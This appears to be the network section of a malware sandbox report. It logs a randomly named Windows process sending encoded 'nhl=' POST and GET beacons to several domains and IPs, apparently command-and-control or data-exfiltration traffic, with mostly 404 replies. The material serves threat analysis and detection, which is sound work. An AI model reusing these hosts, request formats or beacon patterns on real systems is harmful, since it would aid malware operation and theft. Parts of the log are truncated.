Data Raw: 6e 68 6c 3d 76 58 32 75 67 4e 72 2b 68 43 31 2b 50 78 36 47 75 50 2f 53 78 2b 44 51 53 45 5a 4b 64 54 6c 51 2f 42 64 37 69 4d 62 6c 64 68 77 4d 61 49 58 46 4e 77 33 54 2f 35 33 39 73 4e 32 6c 36 2b 55 6f 72 64 2b 37 4f 6a 58 6c 55 6d 52 74 53 56 39 5a 57 33 55 42 39 59 70 55 6f 56 68 36 6a 35 74 6e 39 49 56 55 66 38 55 64 59 7a 70 50 41 6e 43 39 4c 41 50 68 6c 74 5a 78 51 47 74 42 36 32 48 4d 75 75 73 36 37 65 68 61 56 71 44 78 54 47 6d 42 33 34 45 63 4d 57 4b 35 77 43 56 63 42 63 34 34 67 4c 52 51 75 4c 50 5a 48 58 52 79 51 55 56 75 78 6a 5a 77 32 70 36 68 47 68 38 46 78 43 32 66 61 67 3d 3d
Data Ascii: nhl=vX2ugNr+hC1+Px6GuP/Sx+DQSEZKdTlQ/Bd7iMbldhwMaIXFNw3T/539sN2l6+Uord+7OjXlUmRtSV9ZW3UB9YpUoVh6j5tn9IVUf8UdYzpPAnC9LAPhltZxQGtB62HMuus67ehaVqDxTGmB34EcMWK5wCVcBc44gLRQuLPZHXRyQUVuxjZw2p6hGh8FxC2fag==
Oct 9, 2024 13:04:23.355555058 CEST | 479 | IN | HTTP/1.1 404 Not Found
Date: Wed, 09 Oct 2024 11:04:23 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.11.30 | 49851 | 45.56.219.238 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:04:25.889766932 CEST | 627 | OUT | POST /n2yx/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.technew.shop
Cache-Control: max-age=0
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.technew.shop
Referer: http://www.technew.shop/n2yx/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Data Raw: 6e 68 6c 3d 76 58 32 75 67 4e 72 2b 68 43 31 2b 50 51 4b 47 6f 73 6e 53 6c 75 44 66 64 6b 5a 4b 47 6a 6c 63 2f 42 42 37 69 4e 50 31 63 56 63 4d 5a 70 6e 46 4b 78 33 54 34 35 33 39 30 64 32 6b 6b 4f 55 33 72 64 79 5a 4f 69 72 6c 55 6e 31 74 53 58 6c 5a 57 41 34 47 39 49 70 57 67 31 68 30 39 4a 74 6e 39 49 56 55 66 38 41 7a 59 79 42 50 44 58 53 39 4a 68 50 69 37 64 5a 75 48 32 74 42 2b 32 48 58 75 75 73 59 37 61 68 6a 56 75 7a 78 54 48 57 42 33 70 45 64 46 57 4b 2f 30 43 55 79 4a 63 4a 4e 70 76 59 74 34 72 54 5a 43 69 52 4f 56 44 6b 30 73 67 74 79 6c 4a 47 4d 61 67 52 74 7a 41 33 45 48 67 67 77 42 35 30 74 70 71 67 32 65 65 33 61 72 48 55 6f 44 75 6b 3d
Data Ascii: nhl=vX2ugNr+hC1+PQKGosnSluDfdkZKGjlc/BB7iNP1cVcMZpnFKx3T45390d2kkOU3rdyZOirlUn1tSXlZWA4G9IpWg1h09Jtn9IVUf8AzYyBPDXS9JhPi7dZuH2tB+2HXuusY7ahjVuzxTHWB3pEdFWK/0CUyJcJNpvYt4rTZCiROVDk0sgtylJGMagRtzA3EHggwB50tpqg2ee3arHUoDuk=
Oct 9, 2024 13:04:26.005774021 CEST | 479 | IN | HTTP/1.1 404 Not Found
Date: Wed, 09 Oct 2024 11:04:25 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.11.30 | 49852 | 45.56.219.238 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:04:28.529401064 CEST | 2578 | OUT | POST /n2yx/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.technew.shop
Cache-Control: max-age=0
Content-Length: 3336
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.technew.shop
Referer: http://www.technew.shop/n2yx/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Data Raw: 6e 68 6c 3d 76 58 32 75 67 4e 72 2b 68 43 31 2b 50 51 4b 47 6f 73 6e 53 6c 75 44 66 64 6b 5a 4b 47 6a 6c 63 2f 42 42 37 69 4e 50 31 63 55 49 4d 61 66 7a 46 4b 57 62 54 35 35 33 39 39 39 32 66 6b 4f 55 2b 72 64 36 64 4f 69 6e 66 55 6b 64 74 55 32 46 5a 42 69 41 47 79 49 70 57 2f 46 68 31 6a 35 73 6c 39 4d 78 51 66 2f 34 7a 59 79 42 50 44 52 57 39 4f 77 50 69 35 64 5a 78 51 47 74 64 36 32 47 34 75 75 55 69 37 61 6c 7a 56 72 6e 78 53 30 75 42 33 66 51 64 46 57 4b 2f 67 53 55 2f 4a 63 46 41 70 76 68 36 34 70 7a 6e 43 57 70 4f 56 32 70 79 2b 67 70 52 78 62 4b 53 65 6a 56 31 79 57 33 6a 47 41 30 68 45 62 70 64 6d 34 67 32 53 59 7a 46 34 79 56 6a 64 37 4d 4f 51 57 68 53 69 65 74 73 46 49 50 62 65 32 74 30 66 52 44 51 70 44 32 6b 55 30 74 2f 53 32 31 39 57 72 76 6b 2b 32 33 6e 58 31 41 57 4e 44 68 6c 53 33 42 74 58 32 58 46 36 4a 75 79 72 2b 6f 30 4b 38 69 54 46 4e 57 53 67 35 30 72 64 69 55 74 58 34 64 43 6e 47 6e 44 67 64 58 4c 47 4c 30 69 4f 51 42 39 52 6d 46 47 67 7a 66 6d 2f 58 52 41 52 31 4b 4c 6d 49 [TRUNCATED]
Data Ascii: nhl=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 [TRUNCATED]
                                                                                                                                                                Oct 9, 2024 13:04:28.529447079 CEST1166OUTData Raw: 2f 57 49 51 73 61 37 31 44 55 6a 65 71 76 32 57 2f 31 37 34 6b 32 49 79 75 4a 45 4d 33 66 76 52 35 67 70 43 42 45 54 63 58 48 73 64 55 4f 6f 34 6a 43 55 4b 54 62 54 52 64 4b 44 54 7a 73 56 6a 6a 79 4b 51 68 4f 64 6b 73 44 68 6e 49 76 78 63 47 4a
                                                                                                                                                                Data Ascii: /WIQsa71DUjeqv2W/174k2IyuJEM3fvR5gpCBETcXHsdUOo4jCUKTbTRdKDTzsVjjyKQhOdksDhnIvxcGJclu+oOjLfayoLNSi5K4dv8h66ZnY6Oz/FQvoCbgpRItBtRG8llSVpP3rAwg1VQlNI7+IhYRc+1pQF60ZJOumyNXgXE/Q8mnKW5r9MCkWWmWNHNj9YdhduAfHrlj7nffy7C6SuvdYVLqe9kO3US0AN0Pnge8IILgBq
                                                                                                                                                                Oct 9, 2024 13:04:28.650324106 CEST479INHTTP/1.1 404 Not Found
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:04:28 GMT
                                                                                                                                                                Server: Apache
                                                                                                                                                                Content-Length: 315
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 32 | Source IP: 192.168.11.30 | Source Port: 49853 | Destination IP: 45.56.219.238 | Destination Port: 80 | PID: 6156 | Process: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe

Timestamp: Oct 9, 2024 13:04:31.169725895 CEST | Bytes transferred: 346 | Direction: OUT | Data: GET /n2yx/?9X=EvKH2xeP-DpP307P&nhl=iVeOj9H/jw8/ZkXx4eLZhuHPSRtHACVus0wk2djKTDBvc5j/YX614YP79ezpmvAo29KgRB3gLhtmSCFZBXQ4/utJh3JZlsU8+sR9ZpZpYA5vc3CvDS3ciOs= HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Host: www.technew.shop
Connection: close
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1

Timestamp: Oct 9, 2024 13:04:31.285075903 CEST | Bytes transferred: 479 | Direction: IN | Data: HTTP/1.1 404 Not Found
Date: Wed, 09 Oct 2024 11:04:31 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 33 | Source IP: 192.168.11.30 | Source Port: 49854 | Destination IP: 162.0.238.43 | Destination Port: 80 | PID: 6156 | Process: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe

Timestamp: Oct 9, 2024 13:04:36.637264967 CEST | Bytes transferred: 601 | Direction: OUT | Data: POST /w6me/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.allpop.xyz
Cache-Control: max-age=0
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.allpop.xyz
Referer: http://www.allpop.xyz/w6me/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Data Ascii: nhl=US9NFcakjPjaKgBE6Jm0cqATPZdWYmY2QnU8Ju5MR1P1Cb09gJExDd5NFSj6CEpUfbm5YQ3fpwi+dqySv7bXlayh1Slu7B8z4mbFi/T9xn95xg85OrfJMEhtFtYR+uLXzawy1fLexVOW2PRpLmKzLI4bfXUa/GUgEPWFfEsE9mQYDYivlKG9MWAhO9tQd9DvaQ==

Timestamp: Oct 9, 2024 13:04:36.818108082 CEST | Bytes transferred: 533 | Direction: IN | Data: HTTP/1.1 404 Not Found
Date: Wed, 09 Oct 2024 11:04:36 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 34 | Source IP: 192.168.11.30 | Source Port: 49855 | Destination IP: 162.0.238.43 | Destination Port: 80 | PID: 6156 | Process: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe

Timestamp: Oct 9, 2024 13:04:39.338570118 CEST | Bytes transferred: 621 | Direction: OUT | Data: POST /w6me/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.allpop.xyz
Cache-Control: max-age=0
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.allpop.xyz
Referer: http://www.allpop.xyz/w6me/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Data Ascii: nhl=US9NFcakjPjaLBxEpuS0LaAcTJdWP2YyQnY8JvtmRHr1C5s9uoExEd5NNyjFMkplfbibYVPfpwm+drCSvMPUkKynhilokR8z4mbFi/3Txnl5xxs5PKfOBkhuV9YR6uLpzaxV1ar4xTKW2ONpI3KwAI5SCnV21jwvIPeFRk4klTojGPT14Jy/f28MS8A4f/C0HYMAOix/8RWOhib5zka0HiI=

Timestamp: Oct 9, 2024 13:04:39.509960890 CEST | Bytes transferred: 533 | Direction: IN | Data: HTTP/1.1 404 Not Found
Date: Wed, 09 Oct 2024 11:04:39 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 35 | Source IP: 192.168.11.30 | Source Port: 49856 | Destination IP: 162.0.238.43 | Destination Port: 80 | PID: 6156 | Process: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe

Timestamp: Oct 9, 2024 13:04:42.039190054 CEST | Bytes transferred: 1289 | Direction: OUT | Data: POST /w6me/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.allpop.xyz
Cache-Control: max-age=0
Content-Length: 3336
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.allpop.xyz
Referer: http://www.allpop.xyz/w6me/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Data Ascii: nhl= [TRUNCATED]

Timestamp: Oct 9, 2024 13:04:42.039239883 CEST | Bytes transferred: 2449 | Direction: OUT
Data Ascii: 27dn4wQ8ugNjo6hgLzPHUMqQvsdoLgY8OSiuj5eL9Ca3kdTj6B3O3H4FNd0tWsLY3pNTcSiGnsqwy0trLYgy0rfZesoQzDUtTtpN3nDXLNoi7zpTKNAlLS6BZP/vL+9EvzG3Pk3G40BSO6BwvyyoAHH6stUvEz2rWIxdp4ox1NA9gW65Vk7ys0F73EKp38n+4f2Xnh72978GD4xsTnyvnZMKBLTxK5W5Kki7gLTEWWZf0jfJqNw

Timestamp: Oct 9, 2024 13:04:42.211950064 CEST | Bytes transferred: 533 | Direction: IN | Data: HTTP/1.1 404 Not Found
Date: Wed, 09 Oct 2024 11:04:42 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                 Session ID: 36 | Source IP: 192.168.11.30 | Source Port: 49857 | Destination IP: 162.0.238.43 | Destination Port: 80 | PID: 6156 | Process: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                 Timestamp: Oct 9, 2024 13:04:44.737786055 CEST | Bytes transferred: 344 | Direction: OUT
                                                                                                                                                                 GET /w6me/?nhl=ZQVtGrOiyfGmX0Bj7aOLb6McZZRaKXEecgRoMf1rX1qYBYk54P5+D+BVBTSMCHRrFOCnGQPC2mKGS9yi7bLDo6yarw5+jQ0DwziRuqiIpXFZxXsIN5XtUDU=&9X=EvKH2xeP-DpP307P HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.allpop.xyz
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                 Timestamp: Oct 9, 2024 13:04:44.910360098 CEST | Bytes transferred: 548 | Direction: IN
                                                                                                                                                                 HTTP/1.1 404 Not Found
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:04:44 GMT
                                                                                                                                                                Server: Apache
                                                                                                                                                                Content-Length: 389
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                 Session ID: 37 | Source IP: 192.168.11.30 | Source Port: 49858 | Destination IP: 23.227.38.74 | Destination Port: 80 | PID: 6156 | Process: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                 Timestamp: Oct 9, 2024 13:04:50.135679007 CEST | Bytes transferred: 607 | Direction: OUT
                                                                                                                                                                 POST /c0mi/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.zingara.life
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 200
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.zingara.life
                                                                                                                                                                Referer: http://www.zingara.life/c0mi/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 79 6f 70 76 4b 67 57 4a 41 4d 4a 56 53 54 76 72 6a 6a 4b 4e 2b 63 78 79 67 30 69 7a 33 71 73 30 4d 34 6c 75 45 39 51 42 46 68 73 6a 31 66 54 42 70 34 5a 50 74 38 76 75 68 67 4e 74 45 79 53 47 37 63 6d 66 58 45 2f 4c 48 56 4a 69 32 30 57 65 64 35 6c 68 4e 4c 66 77 7a 69 42 48 32 52 79 6b 49 65 63 4d 70 48 2b 4b 70 43 70 69 5a 68 37 55 4e 79 45 61 33 56 5a 54 2f 59 35 56 74 46 35 38 77 4e 42 39 64 72 7a 48 67 59 54 42 65 63 69 5a 57 70 6c 71 44 31 68 37 74 64 73 4e 55 46 50 37 51 30 77 30 72 4e 45 4e 31 48 46 36 6c 5a 54 77 75 4c 67 2f 53 4a 5a 68 6e 44 51 57 42 30 74 78 4a 77 3d 3d
                                                                                                                                                                Data Ascii: nhl=yopvKgWJAMJVSTvrjjKN+cxyg0iz3qs0M4luE9QBFhsj1fTBp4ZPt8vuhgNtEySG7cmfXE/LHVJi20Wed5lhNLfwziBH2RykIecMpH+KpCpiZh7UNyEa3VZT/Y5VtF58wNB9drzHgYTBeciZWplqD1h7tdsNUFP7Q0w0rNEN1HF6lZTwuLg/SJZhnDQWB0txJw==
                                                                                                                                                                 Timestamp: Oct 9, 2024 13:04:50.524318933 CEST | Bytes transferred: 1289 | Direction: IN
                                                                                                                                                                 HTTP/1.1 404 Not Found
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:04:50 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-sorting-hat-podid: 156
                                                                                                                                                                x-sorting-hat-shopid: 68129128605
                                                                                                                                                                vary: Accept-Encoding,Accept
                                                                                                                                                                x-frame-options: DENY
                                                                                                                                                                x-shopid: 68129128605
                                                                                                                                                                x-shardid: 156
                                                                                                                                                                content-language: en-IN
                                                                                                                                                                x-shopify-nginx-no-cookies: 0
                                                                                                                                                                set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:50 GMT; SameSite=Lax
                                                                                                                                                                set-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:50 GMT; SameSite=Lax
                                                                                                                                                                set-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 11:04:50 GMT; SameSite=Lax
                                                                                                                                                                set-cookie: _shopify_y=1df4171f-fe86-4c92-af19-6810bd200ea4; Expires=Thu, 09-Oct-25 11:04:50 GMT; Domain=zingara.life; Path=/; SameSite=Lax
                                                                                                                                                                set-cookie: _shopify_s=7853b78d-753d-4f3f-a5db-c02e04aff0ef; Expires=Wed, 09-Oct-24 11:34:50 GMT; Domain=zingara.life; Path=/; SameSite=
                                                                                                                                                                Data Raw:
                                                                                                                                                                Data Ascii:
                                                                                                                                                                 Timestamp: Oct 9, 2024 13:04:50.524389029 CEST | Bytes transferred: 1255 | Direction: IN
                                                                                                                                                                 Data Raw: 61 78 0d 0a 78 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 36 35 33 31 30 61 66 33 2d 64 61 34 32 2d 34 35 33 66 2d 62 66 36 30 2d 30 65 31 36 63 64 65 37 64 62 34 32 2d 31 37 32 38 34 37 31 38 39 30 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20
                                                                                                                                                                Data Ascii: axx-request-id: 65310af3-da42-453f-bf60-0e16cde7db42-1728471890server-timing: processing;dur=226content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontrol
                                                                                                                                                                 Timestamp: Oct 9, 2024 13:04:50.524513960 CEST | Bytes transferred: 1289 | Direction: IN
                                                                                                                                                                 Data Raw: 36 37 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 6f db 36 14 7e ef af e0 54 0c 68 07 dd 29 5b b6 2a a7 6b d3 76 1b 90 76 c5 3a 60 d8 de 68 89 b6 d8 c8 a2 46 d1 76 d2 a2 ff 7d 87 a4 28 4b 89 d3 ae 09 1a f3 72 ae df b9 f0 b8 f9 0f af 7e bf fc
